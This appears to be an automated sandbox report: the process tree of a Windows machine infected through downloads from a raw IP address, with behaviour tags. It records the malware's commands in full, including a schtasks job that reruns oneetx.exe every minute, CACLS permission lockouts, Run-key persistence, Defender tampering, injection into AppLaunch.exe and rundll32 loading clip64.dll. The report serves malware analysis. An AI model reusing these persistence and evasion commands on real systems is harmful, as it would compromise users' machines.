PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 3336	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 3336	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 2296	632	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://34.101.154.50
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb46e39758,0x7ffb46e39768,0x7ffb46e39778
  2⤵
  PID:3260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:2
  2⤵
  PID:1920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:1
  2⤵
  PID:2600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5052 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5028 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1148 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5260 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5316 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5180 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5036 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2876 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1248
- C:\Users\Admin\Downloads\NmI5NGQx.exe
  "C:\Users\Admin\Downloads\NmI5NGQx.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4808
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1386670.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1386670.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2563617.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2563617.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:4444
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f8338132.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f8338132.exe
        5⤵
        Executes dropped EXE
        
        PID:460
- C:\Users\Admin\Downloads\Y2Q0MzM1.exe
  "C:\Users\Admin\Downloads\Y2Q0MzM1.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4820
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x3618941.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x3618941.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x4612096.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x4612096.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2720
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f5747904.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f5747904.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2608
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3084756.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3084756.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        Windows security modification
        Suspicious behavior: EnumeratesProcesses
        
        PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4240
    - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
        5⤵
        Executes dropped EXE
        
        PID:748
    - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4990012.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2128
      - C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        
        C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4796
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe" /F
        8⤵
        Creates scheduled task(s)
        
        PID:4652
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\c3912af058" /P "Admin:N"&&CACLS "..\c3912af058" /P "Admin:R" /E&&Exit
        8⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        9⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        9⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        9⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\c3912af058" /P "Admin:N"
        9⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        9⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\c3912af058" /P "Admin:R" /E
        9⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\1000035051\foto148.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000035051\foto148.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\x0866244.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\x0866244.exe
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\h0291068.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\h0291068.exe
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe"
        11⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\i3215308.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\i3215308.exe
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\1000036051\fotocr06.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000036051\fotocr06.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\y2170022.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\y2170022.exe
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4180
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\y5542834.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\y5542834.exe
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\k8989832.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\k8989832.exe
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
        12⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\l9912234.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\l9912234.exe
        11⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\m9543478.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\m9543478.exe
        10⤵
        Executes dropped EXE
        
        PID:4920
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\n6343764.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\n6343764.exe
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1636
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        8⤵
        Loads dropped DLL
        
        PID:2620
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i7478602.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i7478602.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5440 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5512 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5244 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:5072
- C:\Users\Admin\Downloads\NGVkZTM3.exe
  "C:\Users\Admin\Downloads\NGVkZTM3.exe"
  2⤵
  - Executes dropped EXE
  PID:644
- - C:\Windows\SysWOW64\Explorer.exe
    Explorer.exe
    3⤵
    PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1792
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\NGVkZTM3.docx" /o ""
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:4144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5408 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5032 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2760 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5756 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5268 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5752 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5660 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5712 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3888 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3892
- C:\Users\Admin\Downloads\ZTQ3MDM2.exe
  "C:\Users\Admin\Downloads\ZTQ3MDM2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1628
- C:\Users\Admin\Downloads\YzlhMGI2.exe
  "C:\Users\Admin\Downloads\YzlhMGI2.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2240 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4896 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5652 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4480 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
